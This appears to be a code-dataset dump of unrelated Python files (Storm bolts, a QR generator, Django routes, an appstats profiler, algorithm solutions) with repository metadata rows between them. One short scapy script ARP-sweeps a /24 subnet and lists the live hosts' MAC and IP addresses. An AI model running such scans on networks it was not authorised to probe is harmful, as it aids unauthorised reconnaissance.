        return all(getattr(self, name) == getattr(other, name)
                   for name in self.__slots__)

    def __ne__(self, other):
        return not (self == other)

    def __repr__(self):
        attrs = ''.join(
            ' %s=%r' % (name, getattr(self, name))
            for name in sorted(self.__slots__))
        return '<%s%s>' % (self.__class__.__name__, attrs)

    def is_heartbeat_tuple(self):
        """True for the synthetic heartbeat tuples Storm sends shell tasks."""
        return self.task == -1 and self.stream == "__heartbeat"

    def is_tick_tuple(self):
        """True for tick tuples generated on a configured interval."""
        return self.task == -1 and self.stream == "__tick"
class Task(object):
    """Shared behavior for Bolt/Spout tasks: handshake and fatal-error reporting."""

    def shared_initialize(self):
        """Run the Storm handshake, record task identity, and call initialize()."""
        conf, context = initComponent()

        # These values are only available with a patched version of Storm.
        self.task_index = context.get('taskIndex', -1)
        self.worker_port = context.get('workerPort', -1)
        self.initialize(conf, context)

    def report_exception(self, base_message, exception):
        """Send a deliberately non-JSON failure summary to Storm.

        Dots are replaced so the '__'-joined message stays one token; the
        non-JSON payload makes the worker error out and restart this task
        (see sendFailureMsgToParent()).
        """
        parameters = (
            base_message,
            os.environ.get('SCRIPT', sys.argv[0]),
            socket.gethostname(),
            'pid', os.getpid(),
            'port', self.worker_port,
            'taskindex', self.task_index,
            type(exception).__name__,
            #str(exception),
        )
        #message = '%s: %s (pid %d) on %s failed with %s: %s' % parameters
        message = '__'.join(str(p).replace('.', '_') for p in parameters)
        sendFailureMsgToParent(message)

        # Sleep for a few seconds to try and ensure Storm reads this message
        # before we terminate. If it does, then our message above will appear in
        # the Storm UI.
        time.sleep(5)
class Bolt(Task):
    """Base class for bolts that manage their own acking."""

    def __init__(self):
        # Optional per-tuple timing; enabled via initialize_profiling().
        if TUPLE_PROFILING:
            self.profiler = BoltProfiler()
        else:
            self.profiler = None

    def initialize(self, stormconf, context):
        """Hook for subclasses; called once after the Storm handshake."""
        pass

    def process(self, tuple):
        """Hook for subclasses; called for every input tuple."""
        pass

    def run(self):
        """Main loop: read tuples forever, answering heartbeats with sync()."""
        global MODE
        MODE = Bolt
        self.shared_initialize()
        profiler = self.profiler
        try:
            while True:
                if profiler is not None: profiler.pre_read()
                tup = readTuple()
                if tup.is_heartbeat_tuple():
                    sync()
                else:
                    if profiler is not None: profiler.post_read()
                    self.process(tup)
                    if profiler is not None: profiler.post_process()
        except Exception as e:
            # Tell Storm we died (so it restarts the task quickly), then log.
            self.report_exception('E_BOLTFAILED', e)
            storm_log.exception('Caught exception in Bolt.run')
            if 'tup' in locals():
                # Only print the first 2000 characters of the tuple, otherwise
                # the message may be too long for certain handlers (e.g.
                # SysLogHandler).
                storm_log.error(
                    'The error occurred while processing this tuple: %s',
                    repr(tup.values)[:2000])
class BasicBolt(Task):
    """Bolt variant that auto-anchors emits to the current tuple and
    acks it automatically after process() returns."""

    def __init__(self):
        # Optional per-tuple timing; enabled via initialize_profiling().
        if TUPLE_PROFILING:
            self.profiler = BasicBoltProfiler()
        else:
            self.profiler = None

    def initialize(self, stormconf, context):
        """Hook for subclasses; called once after the Storm handshake."""
        pass

    def process(self, tuple):
        """Hook for subclasses; called for every input tuple."""
        pass

    def run(self):
        """Main loop: read, process with automatic anchoring, then ack."""
        global MODE
        MODE = Bolt
        global ANCHOR_TUPLE
        self.shared_initialize()
        profiler = self.profiler
        try:
            while True:
                if profiler is not None: profiler.pre_read()
                tup = readTuple()
                if tup.is_heartbeat_tuple():
                    sync()
                else:
                    if profiler is not None: profiler.post_read()
                    # Any emit made inside process() is anchored to this tuple.
                    ANCHOR_TUPLE = tup
                    self.process(tup)
                    if profiler is not None: profiler.post_process()
                    ack(tup)
                    if profiler is not None: profiler.post_ack()
        except Exception as e:
            storm_log.info('Caught exception')
            self.report_exception('E_BOLTFAILED', e)
            storm_log.exception('Caught exception in BasicBolt.run')
            if 'tup' in locals():
                # Only print the first 2000 characters of the tuple, otherwise
                # I've seen errors because the message is too long for
                # SysLogHandler.
                storm_log.error(
                    'The error occurred while processing this tuple: %s',
                    repr(tup.values)[:2000])
class Spout(Task):
    """Base class for spouts: dispatches next/ack/fail commands from Storm."""

    def initialize(self, conf, context):
        """Hook for subclasses; called once after the Storm handshake."""
        pass

    def ack(self, id):
        """Hook: the tuple tree rooted at *id* was fully processed."""
        pass

    def fail(self, id):
        """Hook: the tuple tree rooted at *id* failed or timed out."""
        pass

    def nextTuple(self):
        """Hook: emit the next tuple (or nothing) when Storm asks."""
        pass

    def run(self):
        """Main loop: handle next/ack/fail commands, syncing after each."""
        global MODE
        MODE = Spout
        self.shared_initialize()
        try:
            while True:
                msg = readCommand()
                command = msg["command"]
                if command == "next":
                    self.nextTuple()
                elif command == "ack":
                    self.ack(msg["id"])
                elif command == "fail":
                    self.fail(msg["id"])
                sync()
        except Exception as e:
            # Tell Storm we died (so it restarts the task quickly), then log.
            self.report_exception('E_SPOUTFAILED', e)
            storm_log.exception('Caught exception in Spout.run: %s', str(e))
class BoltProfiler(object):
    """Helper class for Bolt. Implements some simple log-based counters for
    profiling performance."""

    # Emit a summary at least every MAX_COUNT tuples.
    MAX_COUNT = 1000

    def __init__(self):
        self.read_time = self.process_time = 0.0
        self.num_tuples = self.total_num_tuples = 0
        self.start_interval = None

    def pre_read(self):
        """Mark the start of a read; opens a reporting interval if needed."""
        self.t1 = time.time()
        if self.start_interval is None:
            self.start_interval = self.t1

    def post_read(self):
        """Accumulate time spent reading the tuple."""
        self.t2 = time.time()
        self.read_time += self.t2 - self.t1

    def post_process(self):
        """Accumulate processing time; log and reset the counters every
        MAX_COUNT tuples or when the current interval exceeds one second."""
        self.t3 = time.time()
        self.process_time += self.t3 - self.t2
        self.num_tuples += 1
        if self.num_tuples % self.MAX_COUNT == 0 or self.t3 - self.start_interval > 1.0:
            self.total_num_tuples += self.num_tuples
            self.total_time = self.read_time + self.process_time
            storm_log.debug(
                'Bolt profile: total_num_tuples=%d, num_tuples=%d, avg_read_time=%f (%.1f%%), avg_process_time=%f (%.1f%%)',
                self.total_num_tuples,
                self.num_tuples,
                self.read_time / self.num_tuples, self.read_time / self.total_time * 100.0,
                self.process_time / self.num_tuples, self.process_time / self.total_time * 100.0)
            # Clear the timing data.
            self.start_interval = None
            self.num_tuples = 0
            self.read_time = self.process_time = 0.0
class BasicBoltProfiler(object):
    """Helper class for BasicBolt. Implements some simple log-based counters for
    profiling performance."""

    # Emit a summary at least every MAX_COUNT tuples.
    MAX_COUNT = 1000

    def __init__(self):
        self.read_time = self.process_time = self.ack_time = 0.0
        self.num_tuples = self.total_num_tuples = 0
        self.start_interval = None

    def pre_read(self):
        """Mark the start of a read; opens a reporting interval if needed."""
        self.t1 = time.time()
        if self.start_interval is None:
            self.start_interval = self.t1

    def post_read(self):
        """Accumulate time spent reading the tuple."""
        self.t2 = time.time()
        self.read_time += self.t2 - self.t1

    def post_process(self):
        """Accumulate processing time (the ack is timed separately)."""
        self.t3 = time.time()
        self.process_time += self.t3 - self.t2

    def post_ack(self):
        """Accumulate ack time; log and reset the counters every MAX_COUNT
        tuples or when the current interval exceeds one second."""
        self.t4 = time.time()
        self.ack_time += self.t4 - self.t3
        self.num_tuples += 1
        if self.num_tuples % self.MAX_COUNT == 0 or self.t4 - self.start_interval > 1.0:
            self.total_num_tuples += self.num_tuples
            self.total_time = self.read_time + self.process_time + self.ack_time
            storm_log.debug(
                'BasicBolt profile: total_num_tuples=%d, num_tuples=%d, avg_read_time=%f (%.1f%%), avg_process_time=%f (%.1f%%), avg_ack_time=%f (%.1f%%)',
                self.total_num_tuples,
                self.num_tuples,
                self.read_time / self.num_tuples, self.read_time / self.total_time * 100.0,
                self.process_time / self.num_tuples, self.process_time / self.total_time * 100.0,
                self.ack_time / self.num_tuples, self.ack_time / self.total_time * 100.0)
            # Clear the timing data.
            self.start_interval = None
            self.num_tuples = 0
            self.read_time = self.process_time = self.ack_time = 0.0
def initialize_profiling():
    """Enable per-tuple profiling iff the storm logger is at DEBUG level."""
    global TUPLE_PROFILING
    TUPLE_PROFILING = storm_log.isEnabledFor(logging.DEBUG)
    if TUPLE_PROFILING:
        message = 'Tuple profiling enabled. Will log tuple processing times.'
    else:
        message = 'Tuple profiling NOT enabled. Will not log tuple processing times.'
    storm_log.info(message)
class LogStream(object):
    """Object that implements enough of the Python stream API to be used as
    sys.stdout and sys.stderr. Messages are written to the Python logger.
    """

    def __init__(self, logger):
        self.logger = logger

    def write(self, message):
        """Log each line of *message* as a separate error record."""
        for line in message.split('\n'):
            self.logger.error(line)

    def flush(self):
        """No-op, so code that flushes sys.stdout/sys.stderr (e.g.
        print(..., flush=True) or interpreter shutdown) does not crash."""
        pass
| [
"659338505@qq.com"
] | 659338505@qq.com |
5212344b23e0b6e2718d3ec852b6c3ded6518b8b | 4b097a3b3c70290d23da8281caef8d91fa70005c | /models/place.py | fadd992bd247b31ff3d3034ab36695dfc10bb67d | [] | no_license | nataliamedinat/AirBnB_clone | 8e26e2aba4318ab56eefa8fb0f7a51cb0ec10164 | 096e14361604dd1bd26139a16ecedbfc5099a757 | refs/heads/master | 2020-09-06T18:49:07.521218 | 2019-11-25T22:26:28 | 2019-11-25T22:26:28 | 220,513,132 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | #!/usr/bin/python3
""" Place inherits from BaseModel """
from models.base_model import BaseModel
class Place(BaseModel):
    """ Rental place; inherits common fields/behavior from BaseModel """

    city_id = ""            # City.id of the city this place is in
    user_id = ""            # User.id of the owner
    name = ""
    description = ""
    number_rooms = 0
    number_bathrooms = 0
    max_guest = 0
    price_by_night = 0
    latitude = 0.0
    longitude = 0.0
    # NOTE(review): mutable class-level default shared by instances until
    # shadowed -- confirm BaseModel assigns a per-instance value.
    amenity_ids = []        # list of Amenity.id strings
| [
"barbaracalle10i3@gmail.com"
] | barbaracalle10i3@gmail.com |
f1010cdff0106ff59ffa22b5b5d3ee835bf5829f | fcc88521f63a3c22c81a9242ae3b203f2ea888fd | /Python3/0689-Maximum-Sum-of-3-Non-Overlapping-Subarrays/soln-1.py | f62c0aa991d5e1a4c2f04b46e6f6e54a54e99d0f | [
"MIT"
] | permissive | wyaadarsh/LeetCode-Solutions | b5963e3427aa547d485d3a2cb24e6cedc72804fd | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | refs/heads/master | 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 | MIT | 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | null | UTF-8 | Python | false | false | 996 | py | class Solution:
def maxSumOfThreeSubarrays(self, nums: List[int], k: int) -> List[int]:
idx1, idx2, idx3 = 0, k, k * 2
s1, s2, s3 = sum(nums[idx1:idx1 + k]), sum(nums[idx2:idx2 + k]), sum(nums[idx3:idx3 + k])
bests1, bests12, bests123 = s1, s1 + s2, s1 + s2 + s3
besti1 = 0
besti12 = [idx1, idx2]
besti123 = [idx1, idx2, idx3]
n = len(nums)
while idx3 + k < n:
s1 += nums[idx1 + k] - nums[idx1]
s2 += nums[idx2 + k] - nums[idx2]
s3 += nums[idx3 + k] - nums[idx3]
if s1 > bests1:
bests1 = s1
besti1 = idx1 + 1
if bests1 + s2 > bests12:
bests12 = bests1 + s2
besti12 = [besti1, idx2 + 1]
if bests12 + s3 > bests123:
bests123 = bests12 + s3
besti123 = besti12 + [idx3 + 1]
idx1 += 1
idx2 += 1
idx3 += 1
return besti123
| [
"zhang623@wisc.edu"
] | zhang623@wisc.edu |
94458562cd7bf5f91df8d4257fc676713c9cdb93 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Games/Python wow/tests/models/spells/test_buff_schema.py | 86c88aee46e4d4ca161e2602ae7dee3c807b81df | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:e63d9f081f022098267a17e7874b4d2fd1dcffedf91d27fcc4a3820700084f41
size 1940
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
25f5b6a0231aae43d1a222da8cce0e9794ab1980 | 3fd1c9ac583fd6c203455b31887f70ceefc898dd | /lib/qr_generator.py | 2299a1f8a538b3f962111c80a3201294f16d19be | [] | no_license | satyabratsahoo/Rover-AI | 66d354dee494152ade79fec4d73bb2cba1046958 | 162633a811f782ecacc98854b613e8d70cd056ae | refs/heads/master | 2023-02-17T19:18:13.543706 | 2021-01-20T06:22:07 | 2021-01-20T06:22:07 | 300,798,518 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,945 | py | import qrcode
from lib.file import get_full_path
from lib.common import AppConfig
from PIL import Image, ImageDraw, ImageFont
import json
def qr_generate(arg_data, out_path='', label=None, label_font=18, embed_img=None):
    """Render *arg_data* as a high-error-correction QR code PNG at *out_path*.

    label      -- optional caption drawn near the bottom of the image
    label_font -- point size for the caption (loads "arial.ttf" -- assumes a
                  Windows-style font lookup; TODO confirm on other platforms)
    embed_img  -- optional image thumbnailed to <=50x50 and pasted centred
                  (ERROR_CORRECT_H keeps the code scannable despite the overlay)
    """
    # The previous version also pre-opened resources/images/logo.jpg here when
    # embed_img was set; that handle was discarded before use, so the dead
    # load has been removed.
    qr_code = qrcode.QRCode(
        error_correction=qrcode.constants.ERROR_CORRECT_H
    )
    qr_code.add_data(str(arg_data))
    qr_code.make()
    img_qr = qr_code.make_image().convert('L')
    if embed_img is not None:
        size = 50, 50
        face = Image.open(embed_img)
        face.thumbnail(size, Image.ANTIALIAS)
        # Centre the thumbnail on the QR image.
        pos = ((img_qr.size[0] - face.size[0]) // 2, (img_qr.size[1] - face.size[1]) // 2)
        img_qr.paste(face, pos)
    if label is not None:
        draw = ImageDraw.Draw(img_qr)
        font = ImageFont.truetype("arial.ttf", label_font)
        draw.text((50, img_qr.size[1] - 30), label, font=font)
    img_qr.save(out_path)
def generate_rover_control_system():
    """Generate one labelled QR code PNG per configured rover action.

    Reads the 'rover_qr_configs' section from AppConfig; each action yields
    a file named '<action_id>_<action>.png' whose QR payload is a JSON
    object describing the action.
    """
    qr_cfg = AppConfig().config['rover_qr_configs']
    # Paths in the config are '/'-separated; split into get_full_path parts.
    out_path = qr_cfg['out_path'].split('/')
    embed_logo = qr_cfg['embed_log'].split('/')
    app_name = qr_cfg['qr_app_name']
    actions = qr_cfg['action_configs']
    for action, value in dict(actions).items():
        action_id = value['qr_action_id']
        action_detail = value['qr_action_details']
        qr_label = f'{app_name} - {action_id} - {action_detail}'
        out_name = f'{action_id}_{action}.png'
        dict_data = {'app_name': app_name,
                     'action_id': action_id,
                     'action': action,
                     'action_detail': action_detail}
        json_data = json.dumps(dict_data)
        qr_generate(json_data,
                    out_path=get_full_path(*out_path) + '/' + out_name,
                    label=qr_label, embed_img=get_full_path(*embed_logo))
generate_rover_control_system() | [
"satyabratsahoo.kc@gmail.com"
] | satyabratsahoo.kc@gmail.com |
2e0c5b56074e66f23fe0ffc2d2503078ee12ae25 | d3f073366e2b576c23b19af3b7ee891ef2913a2e | /setup-liferay/scripts/test.py | 69de5e8b841d91ca360923b66e00c7992da71cf2 | [] | no_license | bibbox/sys-bibbox-vmscripts | 84000da7f7cf52f591fcd816b0bf1dd2cc3fd33d | aa30c8c210eba245b290037541e64b98dfa633f3 | refs/heads/master | 2022-08-31T09:27:24.577800 | 2020-05-31T13:37:50 | 2020-05-31T13:37:50 | 63,229,596 | 0 | 1 | null | 2019-03-17T15:05:43 | 2016-07-13T08:40:28 | Python | UTF-8 | Python | false | false | 414 | py | import re
# Read /etc/hosts once; the previous version re-read an already-exhausted
# file handle, so the regex below could never match (and leaked the handle).
with open("/etc/hosts", 'r') as hosts:
    content = hosts.read()
print(content)

if re.search(r'255\.255\.255\.255(.*)localhost', content):
    print('match')
else:
    print('nomatch')

# Rebuild the file content with "127.0.0.1 localhost" inserted after the
# first line only.  The previous loop never incremented linenumber, so the
# entry was appended after every line.
newhosts = ""
with open("/etc/hosts", 'r') as f:
    for linenumber, line in enumerate(f):
        newhosts += line
        if linenumber == 0:
            newhosts += "127.0.0.1 localhost\n"
print(newhosts)
"robert.reihs@gmail.com"
] | robert.reihs@gmail.com |
b4d28d4ac9d76360e7ff38057add343ac62aabd8 | aeb0fcc60ad1349a4bb06b5c93628a483178c542 | /tools/csk_test/__init__.py | 833a5f06c5ff381ab10f2acfe0c54334f5cabe8b | [] | no_license | jacke121/YOLOv3_PyTorch | c535ffd52ca2b2b8c0885da76d180b96b333c257 | ad0459c6524ce5edefcc6886985ac843c0abef48 | refs/heads/master | 2020-03-21T23:35:26.729893 | 2018-09-07T10:50:18 | 2018-09-07T10:50:18 | 139,196,231 | 8 | 0 | null | 2018-06-29T21:06:47 | 2018-06-29T21:06:47 | null | UTF-8 | Python | false | false | 335 | py | # !/usr/bin/env python2.7
# -*- coding: utf-8 -*-
from scapy.all import srp, Ether, ARP, conf
# Subnet to sweep for live hosts.
lan = '192.168.25.1/24'

# Broadcast an ARP who-has for every address in the subnet; srp() returns
# (answered, unanswered) packet pairs after the 1-second timeout.
ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF") / ARP(pdst=lan), timeout=1)
for snd, rcv in ans:
    # Pull the responder's MAC and IP out of each ARP reply.
    cur_mac = rcv.sprintf("%Ether.src%")
    cur_ip = rcv.sprintf("%ARP.psrc%")
    print(cur_mac + ' - ' + cur_ip)
| [
"lbg@example.com"
] | lbg@example.com |
c72cbcd440074e6bc7d2e8a2a8c11f0f5a79f2e0 | f458d3f77cf7cb1ebe1da43aa8b2de64b9a2a828 | /ddblog/ddblog/urls.py | 814bc9265417403ab027d3041a9a82fefa9bf76e | [] | no_license | 18372689867/bo_ke | c4715011cda284b1fb9586faf6857d2556b73fe2 | 9e159ebe7bab1899b73258b3c2763ca3d2b044bf | refs/heads/master | 2023-03-08T07:54:53.798940 | 2021-02-23T12:24:11 | 2021-02-23T12:24:11 | 341,542,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,620 | py | """ddblog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from . import views
from user import views as user_views
from btoken import views as btoken_views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
    path('admin/', admin.site.urls),
    path('test_cors', views.test_cors),
    path('test_cors_server', views.test_cors_server),
    # Routes for the blog project.
    # CBV: <app module>.<view class>.as_view()
    # as_view() looks up the method on the view class matching the HTTP
    # request method; if found it is called, otherwise a 405 is raised.
    path('v1/users', user_views.UserView.as_view()),
    path('v1/users/', include('user.urls')),
    path('v1/tokens', btoken_views.TokenView.as_view()),
    path('v1/topics/', include('topic.urls')),
    path('v1/messages/', include('message.urls')),
]

# Serve uploaded media files (development convenience).
urlpatterns += static(settings.MEDIA_URL,
                      document_root=settings.MEDIA_ROOT)
| [
"1671129@qq.com"
] | 1671129@qq.com |
6c01e0c87f1231c1a696e1b6cbdbd868b04e2a06 | 011a750fae8ade67f726a9749e05cc4afb8e360d | /text_file_analyser/test/main.py | 141c4ce62d4e23028bccb531ba11cf934d5e6550 | [] | no_license | MartinCarufel/PycharmProjects | c7e50b66a24d4a216b7a217192fcd446f5324d9f | aaa6c95b3e2e6525586fb6a03d1c9d484065899b | refs/heads/master | 2023-07-05T22:40:38.650892 | 2023-06-26T13:55:13 | 2023-06-26T13:55:13 | 150,859,642 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | from text_file_analyser import Text_File_analyser
import pandas as pd
def main():
    """Split a USB stress-test log on its date markers and print columns 3-4."""
    tf = Text_File_analyser("usb_stress_testIO-04-000979.log")
    # NOTE(review): "\| Date :" relies on Python keeping unknown escape
    # sequences intact; a raw string r"\| Date :" would be clearer -- confirm
    # how Text_File_analyser.data_spliter interprets the pattern first.
    csv_data = tf.data_spliter("\| Date :", " +")
    df = pd.DataFrame(csv_data)
    # Keep only columns 3 and 4 of the split output.
    df = df[[3, 4]]
    print(df)
def main2():
    """Demo: build a small DataFrame containing NaNs and print each row's max."""
    data = {
        "A": [12, 4, 5, None, 1],
        "B": [7, 2, 54, 3, None],
        "C": [20, 16, 11, 3, 8],
        "D": [14, 3, None, 2, 6],
    }
    frame = pd.DataFrame(data)
    print(frame)
    # Row-wise maximum; skipna=True ignores the missing values.
    print(frame.max(axis=1, skipna=True))
if __name__ == '__main__':
    # Run the log-analysis demo when this file is executed directly.
    main()
"maccam6@gmail.com"
] | maccam6@gmail.com |
f0438fb43a911298fba48e71620bc3f5ff15ba8b | c16ab2c9c675bdbca43a4603a14106790d9e7da2 | /lib/gae_mini_profiler/appstats_profiler.py | d1e30d4d9a70e975ccedc29a5068b4e0987559b9 | [
"MIT"
] | permissive | y2bishop2y/microengine | 7e7e8b5852188fcceb9559f9d8d339bf6257a0d7 | 2322fdce0718a06bdc0332682e8ef9e393f8e7af | refs/heads/master | 2021-01-01T18:38:17.250888 | 2013-03-20T08:21:53 | 2013-03-20T08:22:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,136 | py | """RPC profiler that uses appstats to track, time, and log all RPC events.
This is just a simple wrapper for appstats with result formatting. See
https://developers.google.com/appengine/docs/python/tools/appstats for more.
"""
import logging
from pprint import pformat
from google.appengine.ext.appstats import recording
from lib.gae_mini_profiler import util, cleanup, unformatter
class Profile(object):
    """Profiler that wraps appstats for programmatic access and reporting."""
    def __init__(self):
        # Configure AppStats output, keeping a high level of request
        # content so we can detect dupe RPCs more accurately
        recording.config.MAX_REPR = 750
        # Each request has its own internal appstats recorder
        self.recorder = None
    def results(self):
        """Return appstats results in a dictionary for template context."""
        if not self.recorder:
            # If appstats fails to initialize for any reason, return an empty
            # set of results.
            logging.warn("Missing recorder for appstats profiler.")
            return {
                "calls": [],
                "total_time": 0,
            }
        total_call_count = 0
        total_time = 0
        calls = []
        # Per-service aggregates, keyed by the service name prefix
        # (the part of service_call_name() before the first ".").
        service_totals_dict = {}
        likely_dupes = False
        end_offset_last = 0
        # Request summaries seen so far; a repeat summary marks a likely dupe RPC.
        requests_set = set()
        # Key the appstats UI uses to find this request's full record
        # (Python 2 `long`; this file is Python 2 / GAE code).
        appstats_key = long(self.recorder.start_timestamp * 1000)
        for trace in self.recorder.traces:
            total_call_count += 1
            total_time += trace.duration_milliseconds()
            # Don't accumulate total RPC time for traces that overlap asynchronously
            if trace.start_offset_milliseconds() < end_offset_last:
                total_time -= (end_offset_last - trace.start_offset_milliseconds())
            end_offset_last = trace.start_offset_milliseconds() + trace.duration_milliseconds()
            service_prefix = trace.service_call_name()
            if "." in service_prefix:
                service_prefix = service_prefix[:service_prefix.find(".")]
            if service_prefix not in service_totals_dict:
                service_totals_dict[service_prefix] = {
                    "total_call_count": 0,
                    "total_time": 0,
                    "total_misses": 0,
                }
            service_totals_dict[service_prefix]["total_call_count"] += 1
            service_totals_dict[service_prefix]["total_time"] += trace.duration_milliseconds()
            # Human-readable "file:line function" description of each stack frame.
            stack_frames_desc = []
            for frame in trace.call_stack_list():
                stack_frames_desc.append("%s:%s %s" %
                        (util.short_rpc_file_fmt(frame.class_or_file_name()),
                            frame.line_number(),
                            frame.function_name()))
            request = trace.request_data_summary()
            response = trace.response_data_summary()
            likely_dupe = request in requests_set
            likely_dupes = likely_dupes or likely_dupe
            requests_set.add(request)
            request_short = request_pretty = None
            response_short = response_pretty = None
            miss = 0
            # Pretty-printing is best-effort: on any failure we log and fall
            # back to the raw summaries below.
            try:
                request_object = unformatter.unformat(request)
                response_object = unformatter.unformat(response)
                request_short, response_short, miss = cleanup.cleanup(request_object, response_object)
                request_pretty = pformat(request_object)
                response_pretty = pformat(response_object)
            except Exception, e:
                logging.warning("Prettifying RPC calls failed.\n%s\nRequest: %s\nResponse: %s",
                    e, request, response, exc_info=True)
            service_totals_dict[service_prefix]["total_misses"] += miss
            calls.append({
                "service": trace.service_call_name(),
                "start_offset": util.milliseconds_fmt(trace.start_offset_milliseconds()),
                "total_time": util.milliseconds_fmt(trace.duration_milliseconds()),
                "request": request_pretty or request,
                "response": response_pretty or response,
                "request_short": request_short or cleanup.truncate(request),
                "response_short": response_short or cleanup.truncate(response),
                "stack_frames_desc": stack_frames_desc,
                "likely_dupe": likely_dupe,
            })
        # Flatten the per-service aggregates for the template, slowest first.
        service_totals = []
        for service_prefix in service_totals_dict:
            service_totals.append({
                "service_prefix": service_prefix,
                "total_call_count": service_totals_dict[service_prefix]["total_call_count"],
                "total_misses": service_totals_dict[service_prefix]["total_misses"],
                "total_time": util.milliseconds_fmt(service_totals_dict[service_prefix]["total_time"]),
            })
        service_totals = sorted(service_totals, reverse=True, key=lambda service_total: float(service_total["total_time"]))
        return {
            "total_call_count": total_call_count,
            "total_time": util.milliseconds_fmt(total_time),
            "calls": calls,
            "service_totals": service_totals,
            "likely_dupes": likely_dupes,
            "appstats_key": appstats_key,
        }
    def wrap(self, app):
        """Wrap and return a WSGI application with appstats recording enabled.
        Args:
            app: existing WSGI application to be wrapped
        Returns:
            new WSGI application that will run the original app with appstats
            enabled.
        """
        def wrapped_appstats_app(environ, start_response):
            # Use this wrapper to grab the app stats recorder for RequestStats.save()
            if recording.recorder_proxy.has_recorder_for_current_request():
                self.recorder = recording.recorder_proxy.get_for_current_request()
            return app(environ, start_response)
        return recording.appstats_wsgi_middleware(wrapped_appstats_app)
| [
"eberenbaum@okta.com"
] | eberenbaum@okta.com |
9471cea9b5d59083fe068b87504590f4027f45eb | ad8b30544480ba1e5f5b1cb2dec2aa77a644e8d2 | /BOJ/1238_파티.py | 47e4a42bd4b524d433bb52d123cba305548dc8c0 | [] | no_license | hyunwoojeong123/Algorithm | 79abc82d944ca60342a7f8b6fc44fac20ac55123 | 0baaf3222fbbec699ffbec5d4cc680067cf293fb | refs/heads/master | 2023-07-10T18:28:51.934005 | 2021-08-18T01:51:23 | 2021-08-18T01:51:23 | 284,403,698 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,098 | py | import sys,heapq
INF = sys.maxsize  # sentinel distance meaning "unreachable"
input = sys.stdin.readline  # faster line reads for competitive-programming input
def dij(x, graph=None, size=None):
    """Dijkstra's shortest paths from node ``x``.

    Args:
        x: source node index (0-based).
        graph: adjacency list where graph[u] is a list of (weight, v) pairs;
            defaults to the module-level ``a`` so existing ``dij(i)`` callers
            keep working.
        size: number of nodes; defaults to the module-level ``n``.

    Returns:
        List ``d`` of length ``size`` where ``d[v]`` is the shortest distance
        from ``x`` to ``v``, or ``sys.maxsize`` if ``v`` is unreachable.
    """
    g = a if graph is None else graph
    count = n if size is None else size
    d = [sys.maxsize] * count
    d[x] = 0
    # Local priority queue of (distance-so-far, node); using a local list
    # avoids coupling separate calls through a shared module-level heap.
    pq = [(0, x)]
    while pq:
        w, u = heapq.heappop(pq)
        if w > d[u]:
            # Stale entry: u was already settled via a shorter path.
            continue
        for edge_w, v in g[u]:
            nw = w + edge_w
            if nw < d[v]:
                d[v] = nw
                heapq.heappush(pq, (nw, v))
    return d
# Read graph: n nodes, m directed weighted edges, party at node t (1-indexed).
n, m, t = map(int, input().split())
a = [[] for _ in range(n)]  # adjacency list: a[u] holds [weight, v] pairs
heap = []  # scratch priority queue shared with dij()
for _ in range(m):
    x, y, w = map(int, input().split())
    a[x - 1].append([w, y - 1])
# BOJ 1238: each student travels home -> party -> home, so student i's total
# is dist(i, t) + dist(t, i).  (The original subtracted the return leg, which
# is wrong.)  dij(t-1) is loop-invariant, so compute it once instead of n times.
back = dij(t - 1)
ans = [dij(i)[t - 1] + back[i] for i in range(n)]
print(max(ans)) | [
"hw2621@daum.net"
] | hw2621@daum.net |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.